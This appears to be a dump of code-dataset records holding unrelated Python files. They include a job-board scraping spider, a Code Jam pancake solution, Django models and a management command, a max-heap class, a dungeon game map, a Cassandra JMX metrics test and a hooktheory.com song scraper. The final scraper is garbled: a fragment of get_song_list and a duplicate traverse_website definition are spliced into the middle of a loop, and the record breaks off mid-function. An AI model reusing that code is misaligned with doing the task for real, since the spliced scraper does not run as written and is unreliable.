len(sel.xpath('//ul/li[a/div]'))\n\n parse_job_index_rules = {\n 'base': '//ul/li[a/div]',\n 'joburl': {'function': get_job_url},\n 'pagination': {\n 'itemsperpage': {'function': get_items_per_page},\n 'totalitems': {\n 'xpath': {\n 'xpaths': '//div[@id=\"results\"]/div[@class=\"mainresult\"]/\\\n div[@id=\"res\"]/text()',\n 'processors': TakeFirst()\n }\n },\n 'url': {'function': get_page_url}\n }\n }\n\n parse_job_rules = {\n 'title': {\n 'xpath': {\n 'xpaths': [\n '//span[@class=\"titleMore\"]/text()',\n '//div[@class=\"topBar-title\"]/text()'\n ]\n }\n },\n 'description': {\n 'xpath': {\n 'xpaths': [\n '//div[@class=\"left-text-more\"]/*[preceding-sibling::b/text()=\"Description\" and following-sibling::a]',\n '//div[@class=\"job-desc\"]'\n ],\n 'processors': Join('\\n')\n }\n },\n 'location': {\n 'xpath': {\n 'xpaths': [\n '//div[@class=\"right-more\"]/div[span/div/text()=\"Primary Locations: \"]/span/div/b/text()',\n '//span[@id=\"topBar_Location\"]/text()'\n ]\n }\n },\n 
'jobcategory': {\n 'xpath': {\n 'xpaths': [\n '//div[@class=\"right-more\"]/div[span/div/text()=\"Job Category: \"]/span/div/b/text()',\n '//dd[preceding-sibling::dt/text()=\"Job Category\"][1]/p/text()'\n ]\n }\n },\n 'org_name': {\n 'xpath': {\n 'xpaths': '//div[@class=\"right-more\"]/div[span/div/text()=\"Organization: \"]/span/div/b/text()'\n }\n },\n 'jobtype': {\n 'xpath': {\n 'xpaths': [\"//dd[preceding-sibling::dt/text()='Job Type'][1]/p/text()\",\n \"//div[contains(text(), 'Employee Status')]/following-sibling::div/b/text()\"]\n }\n },\n 'referencenumber': {'function': get_referencenumber},\n\n 'company': {\n 'xpath': {\n 'xpaths': \"//dt[.='Name Plate']/following-sibling::dd[1]/p/text()\"\n }\n },\n\n 'educationrequirements': {\n 'xpath': {\n 'xpaths': \"//div[contains(text(), 'Education Level')]/following-sibling::div/b/text()\"\n }\n }\n }\n","sub_path":"brightcorp/brightcorp/spiders/jobaggregator.py","file_name":"jobaggregator.py","file_ext":"py","file_size_in_byte":4321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"648795623","text":"inputFile = open(\"B-large.in\")\r\noutputFile = open(\"B-large.out\", \"w\")\r\n\r\n\r\n\r\ndef getDeepestBlank(sequence):\r\n sequence = sequence[::-1]\r\n for index, char in enumerate(sequence):\r\n if char == \"-\":\r\n return len(sequence) - index\r\n\r\ndef getDeepestContinuousSmile(sequence):\r\n for index, char in enumerate(sequence):\r\n if char == \"-\":\r\n return index\r\n\r\ndef performFlip(sequence, index):\r\n first = list(sequence[0:index])\r\n second = sequence[index:]\r\n\r\n first = first[::-1]\r\n\r\n for index, char in enumerate(first):\r\n if char == \"-\":\r\n first[index] = \"+\"\r\n else:\r\n first[index] = \"-\"\r\n\r\n return \"\".join(first) + second\r\n\r\ntestcases = int(inputFile.readline())\r\n\r\nfor testCase in range(testcases):\r\n seq = inputFile.readline()\r\n\r\n allSmiles = True\r\n\r\n for char in seq:\r\n if char == \"-\":\r\n allSmiles = False\r\n break\r\n\r\n if allSmiles:\r\n print(\"Took\", 0, \"flips\")\r\n outputFile.write(\"Case #\" + str(testCase+1) + \": 0\\n\")\r\n\r\n else:\r\n for i in range(10000):\r\n if seq[0] == \"+\":\r\n seq = performFlip(seq, getDeepestContinuousSmile(seq))\r\n else:\r\n seq = performFlip(seq, getDeepestBlank(seq))\r\n\r\n allSmiles = True\r\n\r\n for char in seq:\r\n if char == \"-\":\r\n allSmiles = False\r\n break\r\n\r\n if allSmiles:\r\n print(\"Took\", i + 1, \"flips\")\r\n outputFile.write(\"Case #\" + str(testCase+1) + \": \" + str(i+1) + \"\\n\")\r\n break\r\n\r\ninputFile.close()\r\noutputFile.close()\r\n","sub_path":"codes/CodeJamCrawler/16_0_2_neat/16_0_2_Grummy_Pancakes.py","file_name":"16_0_2_Grummy_Pancakes.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"388678679","text":"from __future__ import absolute_import\n\n# Standard Library\nfrom datetime import (\n datetime,\n timedelta,\n)\n\n# External Libraries\nfrom django.core.management import BaseCommand\n\n# Project Library\nfrom lindy.ticket.models.ticketaddon import TicketAddOn\n\n\nclass Command(BaseCommand):\n help = 'mark addons abandoned if not paid within 15 min'\n\n def handle(self, *args, **kwargs):\n to_expire = [\n addon for addon in TicketAddOn.objects.all().prefetch_related('ticket__ticketaddon_set')\n if addon.ticket.raw_price\n and not addon.is_paid\n and not addon.is_pending\n and not addon.is_paid_override\n ]\n\n for addon in 
to_expire:\n if addon.created_at < datetime.now(tz=addon.created_at.tzinfo) - timedelta(minutes=15):\n self.stderr.write('Deleting addon id {}'.format(addon.id))\n addon.delete()\n","sub_path":"lindy/ticket/management/commands/addon_expiry.py","file_name":"addon_expiry.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"303173369","text":"from django.db import models\nfrom django.contrib.gis.db import models as gismodels\nfrom django.contrib.auth import get_user_model\nfrom .abstract_base_classes import (\n CreationDatedModel, DescribedModel, NamedModel, PointOfInterest, UpdateDatedModel, Image\n)\n\n\nclass Profile(CreationDatedModel, DescribedModel, NamedModel, PointOfInterest, UpdateDatedModel):\n user = models.OneToOneField(get_user_model(), related_name='profile')\n photo = models.OneToOneField('Photo', related_name='+', null=True, default=None)\n # photo_albums: see PhotoAlbum.owner\n\n\nclass PhotoAlbum(CreationDatedModel, DescribedModel, NamedModel, UpdateDatedModel):\n owner = models.OneToOneField(Profile, related_name='photo_albums')\n # photos: see Photo.album\n\n\nclass Photo(CreationDatedModel, DescribedModel, Image, NamedModel):\n location = gismodels.PointField(blank=True, null=True, srid=4326)\n album = models.ForeignKey('PhotoAlbum', related_name='photos')\n","sub_path":"app/source/geo_django_rf/restapi/models/profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"323061","text":"import math\n\n# Max Binary Heap\n#\tchilds: 2n+1 && 2n+2\n#\tparent: floor[(n-1)/2]\n#\twith 'n' is the index of chosen element\n\nclass MaxBinaryHeap:\n def __init__(self):\n self.values = []\n\n def __len__(self):\n return len(self.values)\n\n def __str__(self):\n return str(self.values)\n\n # ========== INSERTING ==========\n # Re-indexing max heap if it is violated (from bottom up)\n def bubble_up(self, index):\n current = self.values[index]\n parent_idx = math.floor((index-1)/2)\n while parent_idx >= 0:\n parent = self.values[parent_idx]\n if parent < current:\n # Swap\n self.values[index] = parent\n self.values[parent_idx] = current\n index = parent_idx\n parent_idx = math.floor((index-1)/2)\n else: return\n\n # Push new element into the Heap\n def insert(self, val):\n self.values.append(val)\n self.bubble_up(len(self.values)-1)\n\n # ========== REMOVING ==========\n # Re-indexing max heap if it is violated (from top down)\n def sink_down(self):\n length = len(self.values)\n element = self.values[0]\n index = 0 # Keep track of element's index'\n\n while True:\n left_child_idx = 2 * index + 1\n right_child_idx = 2 * index + 2\n \n if left_child_idx < length:\n left_child = self.values[left_child_idx] \n if right_child_idx < length:\n right_child = self.values[right_child_idx] \n # Swap larger child with element\n larger = left_child_idx if left_child > right_child else right_child_idx\n if self.values[larger] > element:\n # Swap\n self.values[index] = self.values[larger]\n self.values[larger] = element\n index = larger\n else: break\n elif left_child > element:\n self.values[index] = left_child\n self.values[left_child_idx] = element\n break\n else: break\n else: break\n return\n\n # Remove max element (highest priority) and return that element\n def extract_max(self):\n if len(self.values) == 0: return\n if len(self.values) == 1: return self.values.pop()\n highest = 
self.values[0]\n self.values[0] = self.values.pop()\n self.sink_down()\n return highest\n\n# Max Heap\n# 9\n# 7 8\n# 3 4 5 6\n\nheap = MaxBinaryHeap()\nheap.insert(9)\nheap.insert(7)\nheap.insert(8)\nheap.insert(3)\nheap.insert(4)\nheap.insert(5)\nheap.insert(6)\nprint(heap) # [9,7,8,3,4,5,6]\nheap.insert(10) \nprint(heap) # [10,9,8,7,4,5,6,3]\n\n# 10\n# 9 8\n# 7 4 5 6\n# 3\n\nheap.extract_max() \nprint(heap) # [9,7,8,3,4,5,6]\n","sub_path":"python/ds/binarytree/binaryheap.py","file_name":"binaryheap.py","file_ext":"py","file_size_in_byte":2569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
+{"seq_id":"572352240","text":"from random import shuffle\nfrom random import randint\nimport logger_decorator\nimport logger\n\nclass DungeonGameMap:\n\n game_entities = {'cell': '-', 'trap': '#', 'treasure':'X', 'player':'I', 'path':'+'}\n treasure_inverse_rate = 20\n trap_inverse_rate = 10\n\n\n @logger_decorator.time_logger_decorator\n @logger_decorator.debug_logger_decorator\n def generate_characters(self, map_square):\n \"\"\"\n generates list of characters except player in random order\n :param: square of map\n :paramtype: int\n :return: list of characters\n :rtype:list(string)\n \"\"\"\n treasures_count = map_square // self.treasure_inverse_rate\n trap_count = map_square // self.trap_inverse_rate\n\n empty_cells_count = map_square - (trap_count + treasures_count)\n\n map_filling = []\n map_filling.extend([self.game_entities['cell'] for count in range(empty_cells_count)])\n map_filling.extend([self.game_entities['trap'] for count in range(trap_count)])\n map_filling.extend([self.game_entities['treasure'] for count in range(treasures_count)])\n\n shuffle(map_filling)\n\n return map_filling\n\n\n @logger_decorator.time_logger_decorator\n @logger_decorator.debug_logger_decorator\n def spawn_player(self, map_filling):\n \"\"\"\n randomly puts player on generated map\n :param: generated list of characters - map\n :paramtype: list(string)\n :return: player spawn position \n :return type: (int,int)\n \"\"\"\n is_empty_cell = False\n player_position = 0\n\n while not is_empty_cell:\n player_position = randint(0, len(map_filling) - 1)\n is_empty_cell = map_filling[player_position] not in [self.game_entities['trap'],self.game_entities['treasure']]\n\n map_filling[player_position] = self.game_entities['player']\n\n player_start_position_x = player_position // self.map_size_x\n player_start_position_y = player_position % self.map_size_x\n\n return [player_start_position_x,player_start_position_y]\n\n\n @logger_decorator.time_logger_decorator\n @logger_decorator.debug_logger_decorator\n def generate_map(self):\n \"\"\"\n transforms list of characters to matrix - list of lists\n :param map_size_x: number of columns\n :param map_size_y: number of rows\n :paramtype map_size_x, map_size_y: int\n \"\"\"\n map_square = self.map_size_x * self.map_size_y\n map_characters_list = self.generate_characters(map_square)\n self.player_spawned_position = self.spawn_player(map_characters_list)\n self.generated_map = [map_characters_list[i*self.map_size_x:(i+1)*self.map_size_x] for i in range(self.map_size_y)]\n\n\n @logger_decorator.time_logger_decorator\n @logger_decorator.debug_logger_decorator\n def __init__(self, map_size_x, map_size_y):\n\n self.map_size_x = map_size_x\n self.map_size_y = map_size_y\n\n self.player_spawned_position = []\n self.generated_map = []\n\n self.generate_map()\n\n\n @logger_decorator.time_logger_decorator\n @logger_decorator.debug_logger_decorator\n def 
print_map(self):\n \"\"\"\n prints map\n :param generated_map: map of characters list of lists\n :paramtype generated_map: list(list(string))\n :return: nothing\n :return type: None\n \"\"\"\n for row in self.generated_map:\n print(''.join(row))\n\n\n @logger_decorator.time_logger_decorator\n @logger_decorator.debug_logger_decorator\n def mark_path(self, position):\n \"\"\"\n marks the visited cells with +\n :param position: cell coordinates to mark\n :paramtype: list[int,int]\n \"\"\"\n x = position[0]\n y = position[1]\n try:\n self.generated_map[x][y] = '+'\n \n except IndexError as index_error:\n logger.logging_object.error(index_error)\n\n\t\n @logger_decorator.time_logger_decorator\n @logger_decorator.debug_logger_decorator\n def get_current_cell_status(self, status):\n \"\"\"\n retrieves the string-name of the cell element\n :param status: one the character of game_entities\n :paramtype: str\n :return: corresponding key from game_entities for character param\n :rtype: str\n \"\"\"\n searched_value = str()\n\n for k, v in self.game_entities.items():\n if v == status:\n searched_value = k\n break\n\n return searched_value\n\n\n @logger_decorator.time_logger_decorator\n @logger_decorator.debug_logger_decorator\n def reinit(self, loaded_map, map_size):\n \"\"\"\n assigns new values to generated_map and map_size_x,map_size_y\n :param loaded_map: loaded map\n :paramtype loaded_map: list(list(str))\n :param map_size: loaded map_size \n :paramtype map_size: list(int,int)\n \"\"\"\n self.generated_map = []\n self.generated_map.extend(loaded_map)\n self.map_size_x = map_size[0]\n self.map_size_y = map_size[1]\n\t\n\nif __name__ == '__main__':\n\n m = DungeonGameMap(5,5)\n m.print_map()\n\n","sub_path":"Masha_Mumrenko/10/dungeon_game_pkg_bonbony/build/lib/dungeon_game_pkg_bonbony/map_creator.py","file_name":"map_creator.py","file_ext":"py","file_size_in_byte":5163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"560528679","text":"from dtest import Tester\nfrom jmxutils import JolokiaAgent, make_mbean, remove_perf_disable_shared_mem\nfrom tools import debug, known_failure, require\n\n\n# We currently only have attributes that are incrementing.\n# MBEAN_VALUES are expressed in tuple with the first value being the class, then the type,\n# a dictionary of arguments for make_mbean(), the attribute, and then the value.\n# MBEAN_VALUES_PRE are values for up to release 2.2, MBEAN_VALUES_POST are for 3.0 and later.\n# In 3.0 \"ColumnFamily\" has been renamed to \"Table\" and \"Row\" to \"Partition\".\n# However, the old names are also supported for backward compatibility and we test them via\n# the mbean aliases, see begin_test().\ndef MBEAN_VALUES_PRE(ks, table, node):\n return [('db', 'Caches', {}, 'CounterCacheKeysToSave', 2147483647),\n ('db', 'Caches', {}, 'CounterCacheSavePeriodInSeconds', 7200),\n ('db', 'BatchlogManager', {}, 'TotalBatchesReplayed', 0),\n ('db', 'Caches', {}, 'RowCacheSavePeriodInSeconds', 0),\n ('db', 'IndexSummaries', {}, 'MemoryPoolSizeInMB', 'MBeanIncrement'),\n ('db', 'IndexSummaries', {}, 'IndexIntervals', 'MBeanIncrement'),\n ('metrics', 'ColumnFamily', {'name': 'AllMemtablesLiveDataSize'}, 'Value', 'MBeanIncrement'),\n ('metrics', 'ColumnFamily', {'name': 'AllMemtablesHeapSize'}, 'Value', 'MBeanIncrement'),\n ('metrics', 'ColumnFamily', {'name': 'AllMemtablesOffHeapSize'}, 'Value', offheap_memtable_val(node)),\n ('metrics', 'ColumnFamily', {'name': 'BloomFilterDiskSpaceUsed'}, 'Value', 'MBeanIncrement'),\n 
('metrics', 'ColumnFamily', {'name': 'BloomFilterFalsePositives'}, 'Value', 'MBeanEqual'),\n ('metrics', 'ColumnFamily', {'name': 'IndexSummaryOffHeapMemoryUsed'}, 'Value', 'MBeanIncrement'),\n ('metrics', 'ColumnFamily', {'name': 'LiveDiskSpaceUsed'}, 'Value', 'MBeanIncrement'),\n ('metrics', 'ColumnFamily', {'name': 'LiveSSTableCount'}, 'Value', 'MBeanIncrement'),\n ('metrics', 'ColumnFamily', {'name': 'MemtableColumnsCount'}, 'Value', 'MBeanIncrement'),\n ('metrics', 'ColumnFamily', {'name': 'MemtableLiveDataSize'}, 'Value', 'MBeanIncrement'),\n ('metrics', 'ColumnFamily', {'name': 'MemtableOnHeapSize'}, 'Value', 'MBeanIncrement'),\n ('metrics', 'ColumnFamily', {'name': 'MemtableSwitchCount'}, 'Value', 'MBeanIncrement'),\n ('metrics', 'ColumnFamily', {'name': 'MemtableOffHeapSize'}, 'Value', offheap_memtable_val(node)),\n ('metrics', 'ColumnFamily', {'name': 'PendingCompactions'}, 'Value', 'MBeanEqual'),\n ('metrics', 'ColumnFamily', {'name': 'MaxRowSize'}, 'Value', 'MBeanEqual'),\n ('metrics', 'ColumnFamily', {'name': 'MinRowSize'}, 'Value', 'MBeanEqual'),\n ('metrics', 'ColumnFamily', {'name': 'MeanRowSize'}, 'Value', 'MBeanDecrement'),\n ('metrics', 'ColumnFamily', {'name': 'RowCacheHit'}, 'Value', 'MBeanEqual'),\n ('metrics', 'ColumnFamily', {'name': 'RowCacheHitOutOfRange'}, 'Value', 'MBeanEqual'),\n ('metrics', 'ColumnFamily', {'name': 'RowCacheMiss'}, 'Value', 'MBeanEqual'),\n ('metrics', 'ColumnFamily', {'name': 'EstimatedRowSizeHistogram', 'keyspace': ks, 'scope': table}, 'Value', 'MBeanEqual'),\n ('metrics', 'ColumnFamily', {'name': 'EstimatedRowCount', 'keyspace': ks, 'scope': table}, 'Value', 'MBeanEqual')]\n\n\ndef MBEAN_VALUES_POST(ks, table, node):\n return [('db', 'Caches', {}, 'CounterCacheKeysToSave', 2147483647),\n ('db', 'Caches', {}, 'CounterCacheSavePeriodInSeconds', 7200),\n ('db', 'BatchlogManager', {}, 'TotalBatchesReplayed', 0),\n ('db', 'Caches', {}, 'RowCacheSavePeriodInSeconds', 0),\n ('db', 'IndexSummaries', {}, 'MemoryPoolSizeInMB', 'MBeanIncrement'),\n ('db', 'IndexSummaries', {}, 'IndexIntervals', 'MBeanIncrement'),\n ('metrics', 'Table', {'name': 'AllMemtablesLiveDataSize'}, 'Value', 'MBeanIncrement'),\n ('metrics', 'Table', {'name': 'AllMemtablesHeapSize'}, 'Value', 'MBeanIncrement'),\n ('metrics', 'Table', {'name': 'AllMemtablesOffHeapSize'}, 'Value', offheap_memtable_val(node)),\n ('metrics', 'Table', {'name': 'BloomFilterDiskSpaceUsed'}, 'Value', 'MBeanIncrement'),\n ('metrics', 'Table', {'name': 'BloomFilterFalsePositives'}, 'Value', 'MBeanEqual'),\n ('metrics', 'Table', {'name': 'IndexSummaryOffHeapMemoryUsed'}, 'Value', 'MBeanIncrement'),\n ('metrics', 'Table', {'name': 'LiveDiskSpaceUsed'}, 'Value', 'MBeanIncrement'),\n ('metrics', 'Table', {'name': 'LiveSSTableCount'}, 'Value', 'MBeanIncrement'),\n ('metrics', 'Table', {'name': 'MemtableColumnsCount'}, 'Value', 'MBeanIncrement'),\n ('metrics', 'Table', {'name': 'MemtableLiveDataSize'}, 'Value', 'MBeanIncrement'),\n ('metrics', 'Table', {'name': 'MemtableOnHeapSize'}, 'Value', 'MBeanIncrement'),\n ('metrics', 'Table', {'name': 'MemtableSwitchCount'}, 'Value', 'MBeanIncrement'),\n ('metrics', 'Table', {'name': 'MemtableOffHeapSize'}, 'Value', offheap_memtable_val(node)),\n ('metrics', 'Table', {'name': 'PendingCompactions'}, 'Value', 'MBeanEqual'),\n ('metrics', 'Table', {'name': 'MaxPartitionSize'}, 'Value', 'MBeanEqual'),\n ('metrics', 'Table', {'name': 'MinPartitionSize'}, 'Value', 'MBeanEqual'),\n ('metrics', 'Table', {'name': 'MeanPartitionSize'}, 'Value', 'MBeanDecrement'),\n ('metrics', 
'Table', {'name': 'RowCacheHit'}, 'Value', 'MBeanEqual'),\n ('metrics', 'Table', {'name': 'RowCacheHitOutOfRange'}, 'Value', 'MBeanEqual'),\n ('metrics', 'Table', {'name': 'RowCacheMiss'}, 'Value', 'MBeanEqual'),\n ('metrics', 'Table', {'name': 'EstimatedPartitionSizeHistogram', 'keyspace': ks, 'scope': table}, 'Value', 'MBeanEqual'),\n ('metrics', 'Table', {'name': 'EstimatedPartitionCount', 'keyspace': ks, 'scope': table}, 'Value', 'MBeanEqual')]\n\n\ndef offheap_memtable_val(node):\n memtable_allocation_type = node.get_conf_option('memtable_allocation_type')\n offheap_memtable = memtable_allocation_type is not None and memtable_allocation_type.startswith('offheap')\n return 'MBeanIncrement' if offheap_memtable else 'MBeanEqual'\n\n\nclass TestJMXMetrics(Tester):\n\n def __init__(self, *args, **kwargs):\n Tester.__init__(self, *args, **kwargs)\n\n @known_failure(failure_source='test',\n jira_url='https://issues.apache.org/jira/browse/CASSANDRA-10845',\n notes='depends on a number of invalid assumptions about metrics')\n @require('10845')\n def begin_test(self):\n \"\"\"\n @jira_ticket CASSANDRA-7436\n This test measures the values of MBeans before and after running a load. We expect\n the values to change a certain way, and thus deem them as 'MBeanEqual','MBeanDecrement',\n 'MBeanIncrement', or a constant to express this expected change. If the value does not reflect\n this expected change, then it raises an AssertionError.\n\n @jira_ticket CASSANDRA-9448\n This test also makes sure to cover all metrics that were renamed by CASSANDRA-9448, in post 3.0\n we also check that the old alias names are the same as the new names.\n \"\"\"\n cluster = self.cluster\n cluster.populate(1)\n node = cluster.nodelist()[0]\n remove_perf_disable_shared_mem(node)\n cluster.start(wait_for_binary_proto=True)\n session = self.patient_cql_connection(node)\n self.create_ks(session, 'keyspace1', 1)\n session.execute(\"\"\"\n CREATE TABLE keyspace1.counter1 (\n key blob,\n column1 ascii,\n value counter,\n PRIMARY KEY (key, column1)\n ) WITH COMPACT STORAGE\n AND CLUSTERING ORDER BY (column1 ASC)\n AND caching = {'keys': 'ALL', 'rows_per_partition': 'NONE'}\n AND comment = ''\n AND compaction = {'min_threshold': '4', 'class': 'org.apache.cassandra.db.compaction.SizeTieredCompactionStrategy', 'max_threshold': '32'}\n AND compression = {}\n AND dclocal_read_repair_chance = 0.1\n AND default_time_to_live = 0\n AND gc_grace_seconds = 864000\n AND max_index_interval = 2048\n AND memtable_flush_period_in_ms = 0\n AND min_index_interval = 128\n AND read_repair_chance = 0.0\n AND speculative_retry = 'NONE';\n \"\"\")\n\n with JolokiaAgent(node) as jmx:\n debug(\"Cluster version {}\".format(cluster.version()))\n if cluster.version() <= '2.2.X':\n mbean_values = MBEAN_VALUES_PRE('keyspace1', 'counter1', node)\n mbean_aliases = None\n else:\n mbean_values = MBEAN_VALUES_POST('keyspace1', 'counter1', node)\n mbean_aliases = MBEAN_VALUES_PRE('keyspace1', 'counter1', node)\n\n before = []\n for package, bean, bean_args, attribute, expected in mbean_values:\n mbean = make_mbean(package, type=bean, **bean_args)\n debug(mbean)\n before.append(jmx.read_attribute(mbean, attribute))\n\n if mbean_aliases:\n alias_counter = 0\n for package, bean, bean_args, attribute, expected in mbean_aliases:\n mbean = make_mbean(package, type=bean, **bean_args)\n debug(mbean)\n self.assertEqual(before[alias_counter], jmx.read_attribute(mbean, attribute))\n alias_counter += 1\n\n node.stress(['write', 'n=100K', 'no-warmup'])\n\n errors = []\n after 
= []\n attr_counter = 0\n for package, bean, bean_args, attribute, expected in mbean_values:\n mbean = make_mbean(package, type=bean, **bean_args)\n a_value = jmx.read_attribute(mbean, attribute)\n after.append(a_value)\n b_value = before[attr_counter]\n if expected == 'MBeanIncrement':\n if b_value >= a_value:\n errors.append(mbean + \" has a before value of \" + str(b_value) + \" and after value of \" + str(a_value) + \" and did not increment\" + \"\\n\")\n elif expected == 'MBeanDecrement':\n if b_value <= a_value:\n errors.append(mbean + \" has a before value of \" + str(b_value) + \" and after value of \" + str(a_value) + \" and did not decrement\" + \"\\n\")\n elif expected == 'MBeanEqual':\n if b_value != a_value:\n errors.append(mbean + \" has a before value of \" + str(b_value) + \" and after value of \" + str(a_value) + \", which are not equal\" + \"\\n\")\n elif expected == 'MBeanZero':\n if not (b_value == 0 and a_value == 0):\n errors.append(mbean + \" has a before value of \" + str(b_value) + \" and after value of \" + str(a_value) + \" and they do not equal zero\" + \"\\n\")\n # If expected is none of the above, then expected should be a number.\n else:\n if a_value != expected:\n errors.append(mbean + \" has an after value of \" + str(a_value) + \" which does not equal \" + str(expected) + \"\\n\")\n attr_counter += 1\n\n self.assertEqual(len(errors), 0, \"\\n\" + \"\\n\".join(errors))\n\n if mbean_aliases:\n alias_counter = 0\n for package, bean, bean_args, attribute, expected in mbean_aliases:\n mbean = make_mbean(package, type=bean, **bean_args)\n self.assertEqual(after[alias_counter], jmx.read_attribute(mbean, attribute))\n alias_counter += 1\n","sub_path":"jmxmetrics_test.py","file_name":"jmxmetrics_test.py","file_ext":"py","file_size_in_byte":12210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"136435966","text":"#Asking the user for the length of the list\r\nlength = int(input(\"Enter length of list\"))\r\nlength_for_while_loop = length\r\nlist1 = []\r\n#Getting the user to input the elements of the list\r\nprint(\"Enter elements of list\")\r\nwhile length_for_while_loop != 0:\r\n new_element = input()\r\n list1.append(new_element)\r\n length_for_while_loop -= 1\r\nprint(\"The list that you entered is:\")\r\nprint(list1)\r\nmiddle = length//2\r\nprint(\"The list after swapping the first half and the second half:\")\r\nnewlist = list1[middle:length] + list1[0:middle]\r\nprint(newlist)","sub_path":"Homeworks/Day 2 HW 1.py","file_name":"Day 2 HW 1.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"332359603","text":"from learn_Scientific import RLagent_Scientific\nfrom Env.Environment import Environment, Workflow\nfrom ScientificWorkflow.XMLProcess import XMLtoDAG\nimport copy\n\ntaskCount = 30\nalpha = 0.6\nDAG = XMLtoDAG(\"../ScientificWorkflow/LIGO_30.xml\", taskCount=taskCount).getDAG()\nmontageWorklfow = Workflow(taskCount=taskCount, alpha=alpha, DAG=DAG)\nenv = Environment(taskCount=taskCount, alpha=alpha, workflow=montageWorklfow)\n\n\nmt = RLagent_Scientific(env, taskCount, alpha, hiddenSize=80, perfix='LIGO')\nmt.epsilon = 0.3\nmt.epsilon_end = 0.05\nmt.epsilon_decay = 200\n\nmt.train()\n","sub_path":"TrainModel/LIGOTrain.py","file_name":"LIGOTrain.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} 
+{"seq_id":"430243857","text":"from sqlalchemy import (select, create_engine)\ndef main():\n engine = create_engine('sqlite:///cookies1.db', echo=True)\n connection = engine.connect()\n s = select([cookies])\n rp = connection.execute(s)\n results = rp.fetchall()\n\n\n\nif __name__ == \"__main__\":main()\n","sub_path":"SqlAlchemy/Ch2A2RetrievingData.py","file_name":"Ch2A2RetrievingData.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"111899041","text":"import requests\nfrom concurrent.futures import ThreadPoolExecutor, as_completed\nfrom bs4 import BeautifulSoup\nimport os\nimport time\nimport json\nimport re\nimport string\n\nwebsite = 'https://www.hooktheory.com'\nbase_url = website + '/theorytab/artists/'\nsleep_time = 0.11\n# alphabet_list = string.ascii_lowercase\nalphabet_list = 'qrstuvwxyz'\nroot_dir = '../datasets'\nroot_xml = '../datasets/xml'\n\n\ndef song_retrieval(artist, song, path_song):\n suffix = '/theorytab/view/' + artist + '/' + song\n song_url = song_url = 'https://www.hooktheory.com' + suffix\n response_song = requests.get(song_url)\n\n soup = BeautifulSoup(response_song.text, 'html.parser')\n\n section_list = [item['href'].split('#')[-1] for item in soup.find_all('a', {'href': re.compile(suffix+'#')})]\n tab_list = soup.find_all('div', {'id': re.compile(\"tab-\")})\n pk_list = [item.get('id').split('-')[-1] for item in tab_list]\n # save xml\n for idx, pk in enumerate(pk_list):\n req_url = 'https://www.hooktheory.com/songs/getXmlByPk?pk=' + str(pk)\n response_info = requests.get(req_url)\n content = response_info.text\n with open(os.path.join(path_song, section_list[idx] + \".xml\"), \"w\", encoding=\"utf-8\") as f:\n f.write(content)\n time.sleep(0.08)\n\n # get genre\n wikiid = soup.findAll(\"multiselect\", {\"items\": \"genres\"})[0]['wikiid']\n response_genre = requests.get('https://www.hooktheory.com/wiki/' + str(wikiid) + '/genres')\n genre_act_list = json.loads(response_genre.text)\n genres = []\n for g in genre_act_list:\n if g['active']:\n genres.append(g['name'])\n\n # saving\n info = {'section': section_list, 'pk': pk_list, 'song_url': song_url,\n 'genres': genres, 'wikiid': wikiid}\n\n with open(os.path.join(path_song, 'song_info.json'), \"w\") as f:\n json.dump(info, f)\n return artist, song, path_song\n\ndef get_song_list(url_artist):\n artist_name = url_artist.split('/')[-1]\n response_tmp = requests.get(website + url_artist)\n soup = BeautifulSoup(response_tmp.text, 'html.parser')\n item_list = soup.find_all(\"li\", {\"class\": re.compile(\"overlay-trigger\")})\n\n song_name_list = []\n for item in item_list:\n song_name = item.find_all(\"a\", {\"class\": \"a-no-decoration\"})[0]['href'].split('/')[-1]\n song_name_list.append(song_name)\n return artist_name, song_name_list\n\ndef traverse_website():\n '''\n Retrieve all urls of artists and songs from the website\n '''\n\n list_pages = []\n archive_artist = dict()\n artist_count = 0\n song_count = 0\n\n for ch in alphabet_list:\n url = base_url + ch\n response_tmp = requests.get(url)\n soup = BeautifulSoup(response_tmp.text, 'html.parser')\n page_count = 0\n\n print('==[%c]=================================================' % ch)\n\n # get artists list by pages\n url_artist_list = []\n for page in range(1, 9999):\n url = 'https://www.hooktheory.com/theorytab/artists/'+ch+'?page=' + str(page)\n print(url)\n response_tmp = requests.get(url)\n soup = BeautifulSoup(response_tmp.text, 'html.parser')\n item_list 
= soup.find_all(\"li\", {\"class\": re.compile(\"overlay-trigger\")})\n\n song_name_list = []\n for item in item_list:\n song_name = item.find_all(\"a\", {\"class\": \"a-no-decoration\"})[0]['href'].split('/')[-1]\n song_name_list.append(song_name)\n return artist_name, song_name_list\n\ndef traverse_website():\n '''\n Retrieve all urls of artists and songs from the website\n '''\n\n list_pages = []\n archive_artist = dict()\n artist_count = 0\n song_count = 0\n\n for ch in alphabet_list:\n url = base_url + ch\n response_tmp = requests.get(url)\n soup = BeautifulSoup(response_tmp.text, 'html.parser')\n page_count = 0\n\n print('==[%c]=================================================' % ch)\n\n # get artists list by pages\n url_artist_list = []\n for page in range(1, 9999):\n url = 'https://www.hooktheory.com/theorytab/artists/'+ch+'?page=' + str(page)\n print(url)\n response_tmp = requests.get(url)\n soup = BeautifulSoup(response_tmp.text, 'html.parser')\n item_list = soup.find_all(\"li\", {\"class\": re.compile(\"overlay-trigger\")})\n\n if item_list:\n page_count += 1\n else:\n break\n\n for item in item_list:\n url_artist_list.append(item.find_all(\"a\", {\"class\": \"a-no-decoration\"})[0]['href'])\n\n print('Total:', len(url_artist_list))\n\n 